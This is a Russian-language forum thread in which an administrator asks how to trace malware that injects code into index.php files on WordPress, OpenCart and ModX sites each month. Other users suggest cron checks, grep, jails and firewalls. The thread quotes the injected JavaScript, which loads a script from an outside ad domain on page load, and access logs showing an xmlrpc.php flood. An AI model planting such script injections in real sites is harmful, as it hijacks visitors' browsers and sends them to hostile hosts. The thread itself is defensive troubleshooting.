forum.lissyara.su

Добавлено: **2016-06-19 1:05:40**

Наверное оффтоп, но, не нашёл куда обратиться. Тут, помню, многие проблемы решать помогали.
Вобщем, что то завелось на серваке, вычислить не могу.
18го числа каждого месяца в файлики index.php первой строкой прописывается зловредный код.
Пароли все менял уже неоднократно, FTP нет, с винды по SSH на сервак в качестве эксперимента уже месяц не ходил
Логи...обрываются до начала работы этой хрени (ну или, скорее, подчищаются после работы этой хрени до безобидных строчек)

Как отловить?

Отправлено спустя 30 минут 56 секунд:

Код: Выделить всё

<script type="text/javascript"> (function(w) { var s = document.createElement('script'); var z = setInterval(function() { if (document.readyState == 'interactive' || document.readyState == 'complete') { clearInterval(z); s.src = "http://92007.w4statistics.info/click.php?p=279773&adult=1&c"; s.async = true; s.type = type = 'text/javascript'; w.document.body.appendChild(s); } }, 200); })(window); </script>

Добавлено: **2016-06-19 14:24:09**

gyurza2000 писал(а): Как отловить?

рид онли ему поставить и dtrace-ом глядеть какая тварь до него докапывается..

Добавлено: **2016-06-20 10:42:38**

gyurza2000 писал(а): 18го числа каждого месяца в файлики index.php первой строкой прописывается зловредный код.

крон смотрели?

Добавлено: **2016-06-20 11:07:37**

Крон смотрел первым делом. Ничего. Read Only поставил.
В каталогах где WWW ничего не нахожу подозрительного. Может какой SHELL завёлся?

Отправлено спустя 2 минуты 56 секунд:
DTrace...боюсь не осилю. Я ни разу не программист. Скрипты писать не умею

Добавлено: **2016-06-20 13:12:43**

а что крутится на этом WWW?

Добавлено: **2016-06-20 13:29:50**

несколько сайтиков:
WordPress, OpenCart, ModX

Добавлено: **2016-06-20 13:30:42**

gyurza2000 писал(а): WordPress

ищите там

Добавлено: **2016-06-20 13:33:16**

да где там искать то...их несколько и куда искать, опыта не имею. Так вроде подозрительных чужеродных файлов не вижу

Добавлено: **2016-06-20 15:29:57**

Electronik писал(а): ищите там

+100500

Добавлено: **2016-06-20 15:43:56**

grep -rin '92007.w4statistics.info'

Добавлено: **2016-06-20 16:29:02**

grep -rin '92007.w4statistics.info'

А если закодирован?Вечером попробую...спасибо

Добавлено: **2016-06-20 16:35:08**

gyurza2000 писал(а):несколько сайтиков:
WordPress, OpenCart, ModX

А почитать про их уязвимости и сравнить что рекомендуют юзать и что стоит на сервере религия не позволяет...

Добавлено: **2016-06-20 16:41:25**

Я атеист

В каком смысле, что стоит на сервере?Я знаю, что на сервере стоит. А WordPressы друзей знакомых. В них очень не хот елось бы лезть. Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

Добавлено: **2016-06-20 16:43:25**

gyurza2000 писал(а): Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

Всех в jail'ы и смотреть где будет нехорошо.

Добавлено: **2016-06-20 16:46:40**

Всех в jail'ы

...ух. Пойду курить Jail. Ни когда не сталкивался

Добавлено: **2016-06-20 17:29:40**

gyurza2000 писал(а): ...ух. Пойду курить Jail. Ни когда не сталкивался

В любом случае это вас не избавит от отлова зловреда в системе. Так что я бы лучше начал с этого.
А после чистки уже можно всех раскидать по клеткам для минимизации возможного ущерба в будущем.

Отправлено спустя 16 минут 29 секунд:
Почитайте вот, и комментарии тоже.
https://habrahabr.ru/company/sprinthost/blog/125839/
Возможно поможет.

Добавлено: **2016-06-20 17:55:10**

ОК. Спасибо. Эту статью уже читал

Добавлено: **2016-06-20 22:16:57**

gyurza2000 писал(а):Я атеист В каком смысле, что стоит на сервере?Я знаю, что на сервере стоит. А WordPressы друзей знакомых. В них очень не хот елось бы лезть. Хотелось бы всё это со стороны сервера прикрыть, а не со стороны CMS

Сервер то ваш, а не друзей знакомых, они доверились вам, а не мне, и ломают вас, а не их через софт, который вы поставили... Клетки дадут только изоляцию, но проблему не снимут, будут же ломать клетку, только потери будут меньшие, а может быть и такие же...

Добавлено: **2016-06-20 22:58:27**

snorlov писал(а): только потери будут меньшие, а может быть и такие же...

думаю такие же, т.к белый IP всё равно будет сервера ТС, конечно если каждой клетке не дать по белому IP. единственный плюс, не сольют БД других сайтов.

Отправлено спустя 20 минут 17 секунд:
кстати у CMS'ок есть свой cron

Добавлено: **2016-06-20 23:04:32**

Electronik писал(а): единственный плюс, не сольют БД других сайтов.

Ну это как один из плюсов. Не инфицируют другие сайты, не получат потенциальный доступ к другим сервисам и т.п. Дырки бывают такие, что и рута получить можно. В любом случае, с jail ущерб наверняка будет меньше и разбираться с ним будет проще.

Отправлено спустя 1 минуту 42 секунды:

Electronik писал(а): кстати у CMS'ок есть свой cron

Как вариант. Кстати, тут крон вообще и не нужен. Если инфицированная страница сайта посещаема хотя бы раз в сутки ничто не мешает зловреду проверять дату и активироваться в нужное число.

Добавлено: **2016-06-21 0:05:52**

xM писал(а): Не инфицируют другие сайты,

Ну если не инфицировали несколько раз до этого, у ТС не в первый раз страницу заражают, то скорее всего действует бот. Ломали бы в ручную, остальные сайты тоже бы инфицировали. С jail в любом случае плюс, тем более не намного производительность падает.

Добавлено: **2016-06-21 0:49:02**

нашёл кое какие логи. По времени вроде бы подходит:

Код: Выделить всё

157.55.39.2 - - [18/Jun/2016:12:24:35 +0400] "GET /search.html?filter_tag=\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2 HTTP/1.1" 200 67131
157.55.39.2 - - [18/Jun/2016:12:24:35 +0400] "GET /search.html?filter_tag=\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2 HTTP/1.1" 200 67131

Данные записи выделяются на фоне остальных...

Отправлено спустя 6 минут 59 секунд:
Это было на OpenCart

А это на WP, чуть раньше:

Код: Выделить всё

146.185.251.210 - - [18/Jun/2016:12:17:05 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:17:12 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:17:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:17:40 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:18:09 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:18:03 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:20:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:20:30 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:20:30 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:20:49 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:21:39 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:12 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:20 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:22:20 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:22:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:22:38 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:22:27 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:22:42 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:23:26 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:24:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:24:22 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:25:09 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:25:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:26:22 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:26:33 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:26:52 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:27:12 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:27:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:27:34 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:27:42 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:27:44 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:27:46 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:28:37 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:28:41 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:28:38 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:29:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:32:14 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:32:32 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:32:31 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:32:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:32:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:32:50 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:34:00 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:34:17 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:34:57 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:36:06 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:36:50 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:37:35 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:37:33 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:37:35 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:37:49 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:38:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:38:03 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:38:09 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:38:32 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:39:23 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
188.143.232.67 - - [18/Jun/2016:12:39:35 +0400] "GET /wp-login.php HTTP/1.1" 200 4321
185.93.185.253 - - [18/Jun/2016:12:40:39 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:41:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:42:38 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:42:53 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:12:43:04 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:43:24 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:43:30 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:43:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:44:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:45:19 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:46:20 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:46:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:46:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:47:26 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:48:11 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:48:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:48:41 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:48:53 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:48:52 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:49:01 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:49:40 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:50:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:12:50:11 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:51:22 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:51:59 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:12:52:01 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:15 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:18 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:12:53:34 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:12:53:43 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:53:59 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:54:47 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:12:55:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:55:15 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:56:55 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
167.114.1.152 - - [18/Jun/2016:12:57:35 +0400] "POST /xmlrpc.php HTTP/1.1" 200 76196
185.93.185.253 - - [18/Jun/2016:12:57:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:12:58:37 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:12:58:56 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.248 - - [18/Jun/2016:12:59:04 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:12:59:06 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:13:00:18 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:00:33 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:00:46 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:01:21 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:02:08 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:02:45 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:03:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.249 - - [18/Jun/2016:13:04:13 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:04:14 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:04:16 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:13:04:26 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.247 - - [18/Jun/2016:13:05:25 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:06:03 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:06:19 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:07:19 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.247 - - [18/Jun/2016:13:08:52 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.253 - - [18/Jun/2016:13:09:23 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:09:40 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:10:02 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:24 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:28 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:11:52 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:12:05 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:13:28 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:13:37 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:14:15 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
185.93.185.253 - - [18/Jun/2016:13:14:27 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
188.143.232.67 - - [18/Jun/2016:13:14:58 +0400] "GET /wp-login.php HTTP/1.1" 200 4321
185.93.185.249 - - [18/Jun/2016:13:14:51 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.248 - - [18/Jun/2016:13:15:02 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
185.93.185.249 - - [18/Jun/2016:13:15:05 +0400] "POST /xmlrpc.php HTTP/1.1" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:00 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:16:49 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:48 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:17:56 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779
146.185.251.210 - - [18/Jun/2016:13:18:13 +0400] "POST /xmlrpc.php HTTP/1.0" 200 779

Добавлено: **2016-06-21 1:31:06**

gyurza2000 писал(а): \xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xba\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xc2\xa2\xc3\xa2\xe2\x82\xac\xc5\xa1\xc3\x82\xc2\xac\xc3\x83\xc6\x92\xc3\xa2\xe2\x82\xac\xcb\x9c\xc3\x83\xe2\x80\xa0\xc3\xa2\xe2\x82\xac\xe2\x84\xa2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb3\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb9%20\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbf\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbe\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xbb\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb8\xc3\x83\xc6\x92\xc3\x82\xc2\x90\xc3\x83\xe2\x80\x9a\xc3\x82\xc2\xb2

обычный децкий шелкод, дизассемблировать его для начала..
потом можно и.. потренироваться на кошках..

Добавлено: **2016-06-21 2:01:19**

Успокоили

Чем?

Добавлено: **2016-06-21 2:57:07**

да не, так мысли вслух, взял себе на заметку..

у вас че фаервола нормального нет, забаньте его к ебеням и всегоделов.. ну как минимум..
ну и коллектив правильно советует, по клеткам их распихать.. если копать ниахота..

forum.lissyara.su

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код

Помогите извести вредный код